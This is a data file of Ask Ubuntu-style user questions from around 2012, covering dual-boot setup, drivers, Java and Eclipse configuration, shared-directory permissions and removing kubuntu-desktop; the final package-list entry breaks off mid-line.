164728	should i choose exfat or ntfs for a `` shared '' partition in a dual-boot system ?	i have a new laptop which i am setting up as dual boot windows/linux . i would like to access files from both ubuntu and windows 7 . should i create a separate ntfs partition ?
164734	wired/wirless connection not available after ubuntu 12.04 install on win7	i installed ubuntu 12.04 on a ntfs partition on my windows 7 machine . after installation ubuntu will not connect to a network either wired or wireless . windows 7 networks work fine . ubuntu recognizes wireless networks , prompt for authorization , yet can not connect . ifconfig shows local loopback ( lo ) and ethernet ( wlan0 ) with no errors , no dropped packets , no overruns . any suggestions ?
164745	needing guidance on making a simple daemon for unity notifications in a python app	i am making an app using pygtk , glade , and quickly and want to make a daemon that runs in the background to provide unity notifications for alarms and events . i would like to find a way to not require root authentication after installing the *deb file . i have tried adding a script to the users crontab but it seems that would require the restart of crond . ( which needs either root or a reboot ) i was wondering if there was a project i should look at to see an example of a daemon in python or how i could go about this ? thank you in advance for any help and feel free to tell me i 'm wrong !
164746	unity 3d and gnome 3 are n't working	when i first got my laptop , unity 3d worked fine . then , suddenly , it stopped . then , regardless of which desktop environment i chose , it booted unity 2d . i tried installing my ati/amd graphics drivers , and only the non-post-release on installs . that does n't even fix the issue . assuming it was an issue with unity , i installed gnome 3 . to my surprise , the same issue occurred again ! when i told it to boot gnome , it went to gnome classic . please help me ! i would really like to have ubuntu up and running on my laptop before i start college .
164747	dual boot issue	i have ubuntu installed along with windows xp through clone cd vcd demon . earlier it was working fine but after 2 months , i 'm not getting the dual boot option ( os selection screen ) therefore i 'm not able to login into ubuntu , but my system shows that ubuntu is still there . can anybody help me out to clear this issue ? thanks in advance .
164759	how to boot multiple os from one external hard drive ?	i have a western digital external hard drive that has plenty of space for more than one os . i currently have three partitions one 250 gb for backups one 100 gb with ubuntu and 500 gb or so miscellaneous . when i go to boot off the drive all i see is the title of the drive ( my passport 0730 ) , it does not see the partitions is there any way around this ? i got it to work mount the drive ( or part ) that u want and know what it is called ( this is what i did not know ) its not like windows where there is the dirve name ( ex . x : \ or passport in my case ) its the mount location or something ... select it when installing and it works : )
164762	can kwin be used in unity ?	unity has a nice layout . i really do like the ambiance and radiance themes . however , i just feel that the window manager itself is lacking . kwin has an excellent tiling mode that automatically handles all my window needs without having to drag , resize , or keypress . i can focus on the information and the work . my question to you is : is there a way to get kwin or another similar tiling window manager to work within unity so that i can have the benefits of both worlds ?
164764	virtual pc error , unable to boot - please use a kernel appropriate for your cpu	i use virtual pc with windows 7 unlimited version , i have amd processor , i have installed windows xp mode , which works fine , i would like to install ubuntu linux operating system , but unable so far , i have searched in google and still can not fix . the error message is : this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . i created a new disk in virtual pc 512m , and download .iso file ( s ) , it gives the same error whether i use 32 bit or 64 bit one . i even checked the option on setup for virtualization : which is enabled . does anyone know how to fix it ? thanks in advance .
164767	ubuntu 12.04x64 server reboot does a shutdown instead of a reboot	i have 12.04 x64 server installed on a new ironsystems ( super micro board ) machine . anytime i try to reboot the machine ( i 've used reboot , shutdown -r , init 6 ) the machine shutsdown instead of rebooting . i need to deploy this machine to a datacenter so not being able to reboot is kind of an issue . any suggestions ? thanks !
164772	is this a bug in gnome-shell ?	i installed gnome-shell a few months ago . this is the package information : $ dpkg-query -- show gnome-shell gnome-shell 3.5.2+git20120615.7524210d-0ubuntu1~12.04~ricotz1 i use ubuntu at work everyday so this is really annoying because i have to restart everytime . here 's the situation : after 4-6 hours of work my chromium window starts to look like this ( when maximize ) : tab titles , bookmarks and buttons disappear ( i have to hover so i can actually see them ) . tab content turns black ( again , hover ) . first i thought it was a chromium issue and minimizing the window seems to solve the problem ( for a while ) : after 30-60 minutes the problems persists and then i have to minimize even more . then , i realized chromium was not the only one . this is geany : same thing with buttons and left panel . i was wondering if this is some kind of known gnome-shell issue and if this is the case , how can i solve it ? thanks edit : from gnome-tweak-tool edit 2 : problem persist even with official gnome-shell ppa p.s . please do n't say `` use unity ''
164775	i installed ubuntu many times , but it 's not working , there is no option to boot ubuntu	i installed ubuntu in a windows 7 pc in its g : partition . but after installation and restarting the pc , there is no option for boot to ubuntu . i am not a computer expert . please help me . during installation how do commands work .
164779	eclipse juno : ca n't install radrails throws error for a gem i have installed already	the thing is i installed ubuntu 12.04 , java ( for eclipse ) , eclipse , ruby , ruby gems , rails . everything went smooth . when i tried to prepare eclipse for ruby on rails , i installed ruby dev kit plugin . this worked , but radrails failed with this error : can not complete the install because one or more required items could not be found . software currently installed : org.radrails.rails-feature 0.7.2 ( org.radrails.rails_feature.feature.group 0.7.2 ) missing requirement : rails core plug-in 0.7.2 ( org.radrails.rails.core 0.7.2 ) requires 'bundle org.eclipse.update.core 0.0.0 ' but it could not be found can not satisfy dependency : from : org.radrails.rails-feature 0.7.2 ( org.radrails.rails_feature.feature.group 0.7.2 ) to : org.radrails.rails.core [ 0.7.2 ]
164782	open source friendly graphics card manufacturers ?	everyone knows that in general , nvidia has the best supported graphics cards under linux . but i do n't want to buy into nvidia 's proprietary drivers if i do n't have to . ati has open source drivers , but they have almost no support , and their open source drivers are significantly worse than their closed source drivers . intel has open source drivers , but their graphics are all integrated and built into the motherboard . are there any graphics card manufacturers which have open source drivers and are actually friendly with the open source community ? i would gladly like to purchase from them if they exist .
164783	installing php4 in a php5 environment	while there are many answers about running php5 and php4 together i have n't found answers that address my specific scenario . i setup a new ubuntu 12.4 server installed apache 2 and php 5.3 . i have a need to run php 4.4.9 due to having to work with an old cms system was written long ago , still maintained and encounters errors when run via php5 . so php5 is running as an apache module . i want to run php4 and everything points to having to run that as cgi . i 've seen the solutions where people had to change file extensions to .php4 and run them through cgi handler , but i do n't have that as an option for either php4 or php5 . too many files and the codebase is shared . first question , can i install php4 as a module as well ? followup , what 's best way to do that ? second question , can i have the handler that switches to php4 do so on a directory path instead of just *.php4 ? so i could tell it a list of directories or use multiple < directory > blocks to have just php files in those directories run as php4 . thanks , - keith
164784	denied access to an ext4 partition after doing a `mount -a` command	i have installed a second internal hard drive . i have read help various help files on mounting via fstab file . after running the mount -a command . the partition is mounted /mnt/films . but when i select the folder i ca n't do anything . i 'm informed that i 'm not the root user , and have no permissions . ( i am a complete beginner learning mode one step at a time ) ubuntu oneric # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=4810412d-43db-477a-b6f2-8f2948924d90 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=967bd3d5-32e5-4f20-9095-446047353d21 none swap sw 0 0 # # /dev/sdb1 is seagate barracuda 2tb uuid=a35d1e8d-4461-4e33-abf7-edea029d7ae5 /mnt/films ext4 rw , sync , user 0 0
164785	how to configure bumblebee in ubuntu 12.04 ?	after running optirun firefox i got the following error failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory i google & found out the solution ln -s /usr/lib/nvidia-current/vdpau/libvdpau_nvidia.so.1 /usr/lib/libvdpau_nvidia.so now i m getting new error . how do i fix this error xlib : extension `` nv-glx '' missing on display `` :0 '' . update one @ ubuntu : ~ $ nvidia-settings -q nvidiadriverversion one @ ubuntu : ~ $ nvidia-settings -q all no output
164788	ubuntu as a router in between windows serveer 2003 and xp client	is it possible to configure ubuntu as a router . wan is connected to windows server 2003 . and clients having xp should connect to internet via ubuntu . thanks in advance , sp
164789	i can not open gnome tweak tool on gnome ubuntu 12.04	i can not open gnome tweak tool on gnome ubuntu 12.04 i want to install gnome themes , but i 've got a problem is gnome tweak tool can not open so how do i change themes on gnome . i had already install faience icon theme and holo themes on my ubuntu . can someone teach me how to change to this themes , thank you !
164790	how can i embed a terminal widget on my desktop ?	i use the command line a lot and i would like a widget ( possibly integrating itself into the desktop ) to provide access to a terminal . like this : http : //www.webupd8.org/2009/05/ubuntu-embed-terminal-into-you-desktop.html
164798	problem installing ubuntu 12.04 ( dual boot ) on mac	i 'm actually running ubuntu 12.04 on my macbook by dvd . but when i try to install only 2 settings appear : replace mac os x with ubuntu something else while i was expecting for install ubuntu alongside mac os x how can i fix that ? thanks .
164802	booting problem with ubuntu and windows	i would like to keep windows ... .. what command should i use ? sudo grab_install /dev/_______ plz help me
164803	dual monitors wo n't work	i am running version 12.04 lts with the additional driver installed for my graphics card ; his radeon hd 5450 silence 1gb ddr3 hdmi hdcp . i have an lg ( do n't know model ) and a dell ( also no model ) attached to the dvi and vga ports on the card , respectively . when i go to `` displays '' and turn on the dell monitor , it 's just blank . i get an error about the resolution not being valid , or something to that effect . i 'm on my work windows laptop right now so just let me know if the exact error would be helpful . any advice is greatly appreciated . t
164819	how can i run an application with a gui as admin from a non-admin user session ?	i defined 2 user accounts : one with admin privilege ( with sudo right ) = > lets call it adminuser . a 2nd one without any privilege = > lets call it normaluser and i configure the autologin on this 2nd user normaluser . so when i open a normaluser session and want to run an application with admin privilege , i open a terminal ctrl+alt+t and : su adminuser sudo anyapplication ... it works fine , without having to quit the normaluser session ( no need to open a adminuser session ) . but what should i do if the application needs to run with a gui ( graphic user interface ) ? i though about that : su adminuser gksu anyapplication ... but i get ** ( gksu:9122 ) : warning ** : the connexion is closed no protocol specified no protocol specified ( gksu:9122 ) : gtk-warning ** : can not open display : :0.0
164820	default screen magnifier ?	i 'm trying to get an ubuntu laptop functional for a visually impaired friend . her impairment is such that a screen magnifier would solve the issue . i 've tried out kmag ( as its the only hit when searching the software center for `` magnifier '' ) , but it seems odd the ubuntu lacks a default . so i 'm assuming i 'm missing something obvious .
164825	no login screen after change from lightdm to xdm	on 12.04 lts , i typed `` apt-get install xdm '' - then a window asked if i wanted lightdm or xdm , and i selected xdm . then i rebooted but the display only showed , for a very long time , the word `` ubuntu '' and orange dots moving over a purple background . there was no login prompt . i was not able to use key sequences such as ctrl-alt-f1 to ctrl-alt-f7 ( or alt-f1 to alt-f7 ) to obtain a text terminal . all of these key sequences were ignored . i rebooted multiple times and this behavior always occurs . what is the easiest way to obtain login access to the system ?
164829	how to install network adapter drivers for atheros ar8161/8165 pci-e gigabit ethernet controller ( ndis 6.20 ) ubuntu 12.04	how can i install drivers for 64-bit atheros ar8161/8165 pci-e gigabit ethernet controller ( ndis 6.20 ) for ubuntu 12.04 . i dual boot windows7/ubuntu 12.04 drivers work for 64-bit windows 7. lspic -nn : 00:00.0 host bridge [ 0600 ] : intel corporation ivy bridge dram controller [ 8086:0154 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation ivy bridge pci express root port [ 8086:0151 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation ivy bridge graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation panther point usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation panther point mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation panther point usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation panther point high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation panther point pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation panther point pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation panther point pci express root port 4 [ 8086:1e16 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation panther point usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation panther point lpc controller [ 8086:1e59 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation panther point 6 port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation panther point smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:0de9 ] ( rev a1 ) 02:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8161 gigabit ethernet [ 1969:1091 ] ( rev 08 ) 03:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 2200 [ 8086:0891 ] ( rev c4 ) 04:00.0 system peripheral [ 0880 ] : jmicron technology corp. sd/mmc host controller [ 197b:2392 ] ( rev 30 ) 04:00.2 sd host controller [ 0805 ] : jmicron technology corp. standard sd host controller [ 197b:2391 ] ( rev 30 ) 04:00.3 system peripheral [ 0880 ] : jmicron technology corp. ms host controller [ 197b:2393 ] ( rev 30 ) 04:00.4 system peripheral [ 0880 ] : jmicron technology corp. xd host controller [ 197b:2394 ] ( rev 30 ) sudo lshw -c network *-network unclaimed description : ethernet controller product : ar8161 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 version : 08 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list configuration : latency=0 resources : memory : d3a00000-d3a3ffff ioport:2000 ( size=128 ) *-network description : wireless interface product : centrino wireless-n 2200 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : c4 serial : 9c:4e:36:14 : d4:7c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-23-generic firmware=18.168.6.1 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:45 memory : d3900000-d3901fff i also tried manually configuring wired connection . nether wired or wireless connects
164834	is there a way to convert cached webex files to some other format ?	how can i convert webex files in the temp cache to generally usable media formats ?
164835	`` glibc_2.14 not found '' error after upgrading to 12.04	i recently got an option to update to 12.04 i believe . something went wrong and when i booted up my laptop it has the original laptop boot screen . it then goes to a ubuntu menu that gives me 5 options . ubuntu with linux 3.0.0-20-generic ubuntu with linux 3.0.0-20-generic ( recovery mode ) previous linux versions memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) i ca n't boot to normal screen . it is messed up bad . please help me somebody ! when i boot the first option it says : mountall : / lib/x86_64- linux-gnu/libc.so.6 : version 'glibc_2.14 ' not found ( required by / lib/libply.so.2 ) general error mounting filesystems . a maintenence shell will now be started . control-d will terminate this shell and reboot system
164836	how to uninstall ubuntu feisty	i have ubuntu running by itself on an older computer . i would like to repurpose the computer using old dos software . i am having the problem that dos 5.0 wo n't recognize hard disk with ubuntu on it . so i can not reformat c : and experience joy . will the ubuntu disk i installed with help me uninstall the program ?
164838	is the 64 bit version of 12.04 the same as the alternate 64 bit ?	specifically , is the 64 bit version of the iso i can download directly from ubuntu.com the same as the `` alternate '' 64 bit version that is available through the universal usb installer ?
164847	ca n't compile in ntfs partition	i want to compile a source code in a ntfs partiotion but can not as shown in the following picture : although i can write files into that partition but compile not ! how can i solve it ?
164853	installing or running ubuntu from usb	i made a boot usb and stuck it in before i launched my computer . the ubuntu screen appeared in black , with options , i chose to install on it on my hard-drive . everything was fine until it got to the stage when the text on the screen displayed ata1.00 : error : { unc } . then it showed ata1 : eh complete it repeatedly showing those two messages and it goes on and on nonstop what can i do ? the original problem was that my dell inspiron mini 10 had windows 7 installed , crashed and on start-up started showing the message : operating system not found . thats when i decided to try ubuntu and that 's what happened .
164854	12.04 server only boots in recovery	linux/ubuntu rookie here , so please be patient , and thank you in advance for any help ! i recently installed ubuntu 12.04 server 32-bit on my old dell dimension e310 . when i boot it up , it takes me to the grub bootloader , and i select the 12.04 server option . after that , things are slightly inconsistent . usually , i will see some of the text fly through on the screen as it 's loading it all up , and then the whole machine suddenly reboots without ever fully loading . sometimes , it will be a black screen for a few seconds , and then restart . and rarely , it will be black , and just hang up indefinitely until i have to force a shutdown . if i boot into recovery mode from grub , and then once at the recovery screen select normal and continue on , everything works just fine , and i can get on and use the server as expected . at first , i ended up just reformatting the entire drive and doing a completely fresh install , this time with a cd instead of the usb , but i still get the same issue . also , to add to the mystery , before i had 12.04 server , i had 12.04 desktop doing the exact same thing . 12.04 desktop is still installed on the second hard drive in the server if that 's relevant , but i eventually plan to clear that all off , so i 'm only looking to get 12.04 server running . to clarify , server is on one hard drive , desktop is on the other . please let me know if there is any additional information i can provide to help diagnose or solve the issue ! i 'm new , but i 'm motivated to learn . : ) just a bit stumped at the moment ! thanks again !
164861	how can i get rid of old versions of software on lubuntu ?	without knowing whether they are there or not . i notice i have a java policy tools 6 and 7 which means that the old one did n't go . i would like to clean up the computer by getting rid of old software/conflicts
164862	best setup for a java ee developer machine	i have a dual-boot machine , windows 7 and ubuntu 12.04 . when i 'm using windows , i have a c : \dev directory that , say , is my `` root folder '' under which i have all the tools ( c : \dev\jdk1.7 for jdk , c : \dev\eclipse for eclipse and so on ) . how can i setup something ( functional and ) similar in my ubuntu , say , under my /home folder ? are there some kind of `` best setup '' for a linux-based java ee developer machine ? thanks in advance .
164863	jdk/jre explanation of comands for install	maybe this is a simple question . i do n't find the explanation of the commands for install java jdk and jre i downloaded the jdk-7u5-linux-x64.tar.gz and jre-7u5-linux-x64.tar.gz , i extracted these files and then moved to /usr/lib/jvm/ . whell i guess that the name /jvm ( i created that beacause i do n't had it ) is not important beacause the installation is by link . most webs tell me that i have write that but they not explain why . i guess that this create a java 's link in /usr/bin/ /usr/bin/java - > /etc/alternatives/java - > /usr/lib/jvm/jdk1.7.0_05/bin/java sudo update-alternatives -- install /usr/bin/java java /usr/lib/jvm/jdk1.7.0/bin/java 1 /usr/bin/java ================== > is the final link java ======================== > i do n't understand why i have to write that /usr/lib/jvm/jdk1.7.0_05/bin/java == > original file 1 =========================== > why 1 ? some people write 2 , 3 or i saw 2000 ! the same in java , javac and javaws . and the same in jre , but when i install jre , th link is replaced sudo update-alternatives -- install /usr/bin/java java /usr/lib/jvm/jre1.7.0/bin/java 2 and when i choose sudo update-alternatives -- config java i can only choose one , so what is the difference between jdk/bin/java and jre/bin/java ( they are the same version ) can anyone explain me that in a simple way ? because i 'm beginner in that , i do n't know nothing of java , i only need these javas for other program that use it can anyone send me a good page for the correct installation of both , please . thanks
164864	unknown option -dsun.java2d.opengl=true	i 'm trying to speed up netbeans on ubuntu . i was reading about that on http : //performance.netbeans.org/howto/jvmswitches/ i get this error : sh /home/umpirsky/applications/netbeans-7.2rc1/bin/netbeans -j-xverify : none -j-xmx384m -dsun.java2d.opengl=true unknown option -dsun.java2d.opengl=true should i use some special version of java ?
164869	configure what jvm eclipse runs in	how do i configure what jvm eclipse runs in ? i 'm trying to switch it to use my installed java-6-sun so that i can use jstack to figure out why eclipse is spinning endlessly in certain situations . i recently upgraded to ubuntu 12.04 , and i 'm using the pre-packaged ubuntu eclipse 3.7.2 . i tried to adding the -vm option to eclipse.ini ( immediately above the -vmargs line in my /etc/eclipse.ini ) , but top still shows that eclipse is running with plain old /usr/bin/java . the ubuntu community wiki article for eclipse mentions /etc/eclipse/java_home , which does n't exist on my system .
164870	how do i reset the `` document viewer '' ( evince ) toolbar ?	i have edited my toolbar but i do n't know how to reset it .
164874	how can i setup a shared directory so that files moved/copied into the directory inherit the directory 's permissions ?	there have been several questions regarding the creation of a shared directory accessible to all users of a group ( notably this one ) ; however i have yet to find a satisfactory answer to this specific problem . i have a directory ( /home/shared ) which is owned by root : lab and has 2775 permissions ( rwxrwsr-x ) . the intent of this directory is that all users in group lab can work together on files in the directory . this currently works fine so long as files and directories are created within the /home/shared directory , but requires manual editing of permissions whenever files are copied over from another location , which is inconvenient . i get the feeling that this is n't something that can be resolved using only the standard permission system of linux , so i 'm open to solutions which would make use of additional programs . my temporary solution for now is just to have a script in crontab which updates the permissions every couple minutes , but this is a total hack and i 'm sure there must be a more elegant solution to this .
164875	can i run `` live '' ubuntu from a usb drive ?	i installed ubuntu 12.04 on a usb drive via the universal usb installer , but it only gives me the option to install ubuntu , not `` try '' ubuntu . is this not possible ? the problem is , i do n't have access to a cd burner .
164879	ubuntu 12.04 dvd/rw has stopped mounting and can not gain access to dvd/rw	i have followed a number of threads over the last 6-8 hours but i am unable to get my removable disk drive to mount ( either automatically or via the terminal command line ) . the processor is an amd64 athlon 3500+ and the dvd drive is a tsstcorp cd/dvdw ts-h552d hp06 . i have tried to reinstall ubuntu , but because the drive doesnt mount on system boot , i can not approach it from this angle either ! very frustrating !
164887	documentation for quickly widgets ?	i tried to use the quickly.widgets.text_editor class in a quickly project just now ( as in one of the highlighted quickly tutorials ) and got an import error . when i tried to inspect the quickly.widgets module i got an import error . does quickly still include its own widgets ? does it still include the text_editor widget ? there does n't seem to be any coherent api documentation for quickly on the ubuntu developers site ! ( sorry if i 'm just missing something obvious . ) thanks .
164888	how to compile wine	i am a wine ppa user for scott ritchie for several years and have loved that ppa but i want to start compiling wine for testing purposes in another pc with ubuntu . so i have a couple of questions regarding this : what special flags or steps are needed to compile wine on ubuntu ? how to include the pulseaudio code to wine to solve any sound issues in the process ?
164892	why do youtube videos stop loading after suspend ?	the question is about a mild problem , plus a curiosity . when i suspend my netbook ( leave it suspended for some hours ) and bring it back , my youtube videos keep playing for a short while , then stop . my guess is that , while there is a bit of the video in cache , the plugin cant re-establish the connection to youtube . why does this happen ? is there a way to fix it ? maybe its some kind of intrinsic limitation of the http protocol , maybe just something poorly done , or maybe a problem in my setup =p
164894	battery management does n't recognize removal of power supply	i have a lenovo y460p running ubuntu 12.04 ( 64-bit ) . the battery does charge normally , but unplugging the power supply only very briefly shows the correct battery indicator . after about 1 second , it reverts to the charging indicator . if the power supply is connected the power statistics show : '' supply yes '' '' online yes '' if it is not connected it shows : '' supply yes '' '' online no '' my problem is almost exactly like the one in this post : ubuntu 11.10 power management does not recognize removal of power supply the only exception is that my system does not dual-boot with windows . this is ubuntu only . the computer in the other post is a lenovo as well ; not sure if that has anything to do with it . any help would be greatly appreciated . thanks .
164897	unity 3d vs unity 2d vs gnome shell for battery life ( resource use )	i 'm currently trying to choose between gnome shell and unity 2d/3d for my ubuntu installation on my laptop ( i do n't really like the dull look of some environments like xfce ) . of the three , which uses the most resources ( battery ) ? the least ? i know that unity will use more than its 2d counterpart , but i 'm not sure how the both of them compare to gnome shell .
164898	ubuntu 11.10 on macbook air 2011 - problems with drivers	i had just installed ubuntu 11.10 on my macbook air , and have a lot of problems . i used this tutorial , after executing script and rebooting some problems were solved , but now i have completely not working touchpad , keyboard & screen backlight works incorrect ( screen brightness is not 100 % , but it is 100 % in settings , keyboard backlight turns on/off randomly ) . how to fix it ? p. s. script said that it 's no such file or directory for some .icc file . google says , that i should copy it from mac os x drive , but i completely replaced it with ubuntu .
164901	how to make docky and gnome shell work together ?	i like gnome shell and i like docky . the problem is that the gnome shell places the notifications and that little notification dock down there . i want to place docky at the bottom but then the notifications interfere with it . is it possible to move ( off possible ) everything related to the no fixations to the panel and/or the top right ? thanks
164903	anyone else suddenly having problems tethering their android or smartphone to 12.04 ?	i 've been usb tethering with my nexus s for over a year with no problems . went on vacation last week , came back , and discovered tethering no longer works . the phone actually thinks its tethered just fine and shows the tethering icon in the top menu bar as normal . but ubuntu 's connection icon in the top right sys tray just sits there spinning , unable to complete the connection . i also tried wireless hotspot and bluetooth , but neither seems to work either ( hotspot has always worked in the past , never tried bluetooth tethering till today ) . normal wireless routers ( home , library , starbucks , etc . ) still work fine , it 's just connecting to my phone that appears broken . no idea what 's the problem , a recent update maybe ?
164905	awesomewm returning to lightdm after trying to log in	i recently installed awesomewm , everything was going fine til i tried to edit the rc.lua . it would n't let me save from awesomewm so i opened up unity and saved it from there and when i tried to log back into awesome it just keeps throwing me back to the lightdm login screen . i have tried sudo apt-get remove awesomeand then reinstalling it . i have tried getting a working rc.lua from google and neither of these work . i do n't really know what to do . it just keeps throwing me back to the login box , unity and 2d are both working fine . very strange inded .
164907	why do i get rsync error 20 when trying to customize ubuntu ?	when trying to customize my ubuntu desktop live iso i 'm coming across an rsync error in the first stages of the tutorial . when i execute : sudo rsync -- exclude=/casper/filesystem.squashfs -a mnt/ extract-cd the copy starts with no output . i left this running for around 40 minutes and have assumed that something went wrong in the copy . sudo rsync -ax mnt/ extract-cd i tried this command too and i got the same error after pressing ctrl+c . this is the error i am getting : rsync error : received sigint , sigterm , or sighup ( code 20 ) at rsync.c ( 549 ) [ sender=3.0.9 ] any suggestions/tips would be welcome edit this is the link to the output from the command you suggested i run : rsync output i looked at your recommendation of using ubuntu-builder . i am using ssh to access the computer with no possibility of using an ui . i tried the ubuntu customization kit this morning running the by running the uck-remaster-unpack-iso . my understandinf of this command is that it runs a script similar to what i was typing in by hand . this command also stops producing output and i exited it after 10 minutes ( no error output was given ) .
164908	problem while removing kubuntu-desktop	i tried to remove kubuntu-desktop using this command -- > http : //www.psychocats.net/ubuntu/pureubuntu [ chk link plz ] and this is it 's output and nothing being removed ! : ( -- hilal @ hilal-pc : ~ $ sudo apt-get remove akonadi-backend-mysql akonadi-server akregator amarok amarok-common amarok-utils apport-kde apturl-kde ark bluedevil cdparanoia cdrdao cryptsetup docbook-xml docbook-xsl dolphin dragonplayer freespacenotifier gnupg-agent gnupg2 gpgsm gpsd gstreamer0.10-qapt gtk2-engines-oxygen gtk3-engines-oxygen gwenview ibus-qt4 icoutils jockey-kde k3b k3b-data kaccessible kaddressbook kamera kate kate-data katepart kcalc kde-baseapps-bin kde-baseapps-data kde-config-gtk kde-config-touchpad kde-runtime kde-runtime-data kde-style-oxygen kde-wallpapers-default kde-window-manager kde-window-manager-common kde-workspace kde-workspace-bin kde-workspace-data kde-workspace-kgreet-plugins kde-zeroconf kdegames-card-data kdegraphics-strigi-analyzer kdelibs-bin kdelibs5-data kdelibs5-plugins kdemultimedia-kio-plugins kdenetwork-filesharing kdepasswd kdepim-kresources kdepim-runtime kdepim-strigi-plugins kdepimlibs-kio-plugins kdesudo kdm kdoctools khelpcenter4 kinfocenter klipper kmag kmail kmenuedit kmix kmousetool knotes konsole kontact kopete kopete-message-indicator korganizer kpat kppp ksnapshot ksysguard ksysguardd ksystemlog ktimetracker ktorrent ktorrent-data kubuntu-debug-installer kubuntu-default-settings kubuntu-desktop kubuntu-docs kubuntu-firefox-installer kubuntu-netbook-default-settings kubuntu-notification-helper kubuntu-web-shortcuts kvkbd kwalletmanager language-selector-kde libakonadi-calendar4 libakonadi-contact4 libakonadi-kabc4 libakonadi-kcal4 libakonadi-kde4 libakonadi-kmime4 libakonadi-notes4 libakonadiprotocolinternals1 libassuan0 libattica0.3 libbluedevil1 libboost-program-options1.46.1 libcalendarsupport4 libcln6 libclucene0ldbl libdebconf-kde0 libdlrestrictions1 libdmtx0a libencode-locale-perl libepub0 libeventviews4 libfile-listing-perl libflac++6 libfont-afm-perl libgadu3 libgif4 libgpgme++2 libgps20 libgrantlee-core0 libhtml-form-perl libhtml-format-perl libhtml-parser-perl libhtml-tagset-perl libhtml-tree-perl libhttp-cookies-perl libhttp-daemon-perl libhttp-date-perl libhttp-message-perl libhttp-negotiate-perl libibus-qt1 libilmbase6 libincidenceeditorsng4 libindicate-qt1 libio-socket-inet6-perl libio-socket-ssl-perl libk3b6 libkabc4 libkactivities-bin libkactivities6 libkalarmcal2 libkateinterfaces4 libkatepartinterfaces4 libkblog4 libkcal4 libkcalcore4 libkcalutils4 libkcddb4 libkcmutils4 libkde3support4 libkdeclarative5 libkdecorations4 libkdecore5 libkdegames5a libkdepim4 libkdepimdbusinterfaces4 libkdesu5 libkdeui5 libkdewebkit5 libkdgantt2 libkdnssd4 libkemoticons4 libkephal4abi1 libkexiv2-10 libkexiv2-data libkfile4 libkholidays4 libkhtml5 libkidletime4 libkimap4 libkio5 libkipi-data libkipi8 libkjsapi4 libkjsembed4 libkldap4 libkleo4 libkmanagesieve4 libkmbox4 libkmediaplayer4 libkmime4 libknewstuff2-4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkonq-common libkonq5-templates libkonq5abi1 libkontactinterface4 libkopete4 libkparts4 libkpgp4 libkpimidentities4 libkpimtextedit4 libkpimutils4 libkprintutils4 libkpty4 libkresources4 libkrosscore4 libksba8 libkscreensaver5 libksgrd4 libksieve4 libksieveui4 libksignalplotter4 libktexteditor4 libktnef4 libktorrent-l10n libktorrent3 libkunitconversion4 libkwineffects1abi3 libkwinglutils1 libkwinnvidiahack4 libkworkspace4abi1 libkxmlrpcclient4 liblastfm0 libloudmouth1-0 liblwp-mediatypes-perl liblwp-protocol-https-perl libmailcommon4 libmailtools-perl libmailtransport4 libmessagecomposer4 libmessagecore4 libmessagelist4 libmessageviewer4 libmicroblog4 libmpcdec6 libmsn0.3 libmuonprivate1 libmygpo-qt1 libmysqlclient18 libnepomuk4 libnepomukdatamanagement4 libnepomukquery4a libnepomuksync4 libnepomukutils4 libnet-http-perl libnet-ssleay-perl libntrack-qt4-1 libntrack0 libokularcore1abi1 libopenexr6 libotr2 libphonon4 libplasma-geolocation-interface4 libplasma3 libplasmaclock4abi3 libplasmagenericshell4 libpolkit-qt-1-1 libpoppler-qt4-3 libprison0 libprocesscore4abi1 libprocessui4a libqalculate5 libqapt-runtime libqapt1 libqca2 libqca2-plugin-ossl libqgpgme1 libqimageblitz4 libqjson0 libqrencode3 libqt4-designer libqt4-help libqt4-qt3support libqt4-scripttools libqt4-sql-mysql libqt4-test libqtassistantclient4 libqtglib-2.0-0 libqtgstreamer-0.10-0 libqtscript4-core libqtscript4-gui libqtscript4-network libqtscript4-sql libqtscript4-uitools libqtscript4-xml libqtwebkit4 libreoffice-kde libreoffice-style-oxygen libsocket6-perl libsolid4 libsolidcontrol4abi2 libsolidcontrolifaces4abi2 libsoprano4 libstreamanalyzer0 libstreams0 libsyndication4 libtag-extras1 libtaskmanager4abi3 